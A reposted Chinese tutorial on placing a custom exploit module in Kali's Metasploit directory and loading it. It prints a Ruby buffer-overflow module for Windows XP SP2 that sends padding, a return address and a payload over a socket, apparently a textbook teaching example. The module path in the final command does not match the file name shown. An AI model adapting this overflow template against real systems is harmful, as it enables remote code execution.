給kali的Metasploit下添加一個新的exploit

轉載:https://blog.csdn.net/SilverMagic/article/details/40978081

• 首先在/usr/share/metasploit-framework/modules/exploits/目錄下新建一個自定義文件夾，例如fwdtest

• 仿造exploits目錄下的其他exp(rb文件)編寫自己的exp.rb腳本(這邊用0day安全:軟件漏洞分析技術里的一個栗子)

 

1.  
   root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest # ls
2.  
   0day1.rb
3.  
   root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest # cat 0day1.rb
4.  
   ##
5.  
   # This module requires Metasploit: http //metasploit.com/download
6.  
   # Current source: https: //github.com/rapid7/metasploit-framework
7.  
   # #
8.  
   require 'msf/core'
9.  
   class Metasploit3 < Msf::Exploit::Remote
10.  
    include Msf::Exploit::Remote::Ftp
11.  
    def initialize(info = {})
12.  
    super(update_info(info,
13.  
    'Name' => 'security test',
14.  
    'Description' => %q{
15.  
    This module exploits a buffer overflow.
16.  
    },
17.  
    'Author' => 'fwd',
18.  
    'License' => MSF_LICENSE,
19.  
    'Privileged' => true,
20.  
    'Payload' =>
21.  
    {
22.  
    'Space' => 300,
23.  
    'BadChars' => "\x00",
24.  
    },
25.  
    'Platform' => 'win',
26.  
    'Targets' =>
27.  
    [
28.  
    [ 'Windows XP Pro SP2 English', { 'Ret' => 0x7c809f83 } ],
29.  
    ]))
30.  
    end
31.  
     
32.  
    def exploit
33.  
    connect
34.  
    attack_buf = 'a'* 200
35.  
    attack_buf += [target.ret].pack( 'V')
36.  
    attack_buf += payload.encoded
37.  
    sock.put(attack_buf)
38.  
    handler
39.  
    disconnect
40.  
    end
41.  
    end
42.  
    root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest#

 

• 在控制台下啟動metasploit

• 在msf提示符下輸入reload_all重新加載所有模塊

• 在msf提示符下輸入use exploit/fwdtest/exp(輸入的時候可以用tab補全，如果不能補全說明就有問題)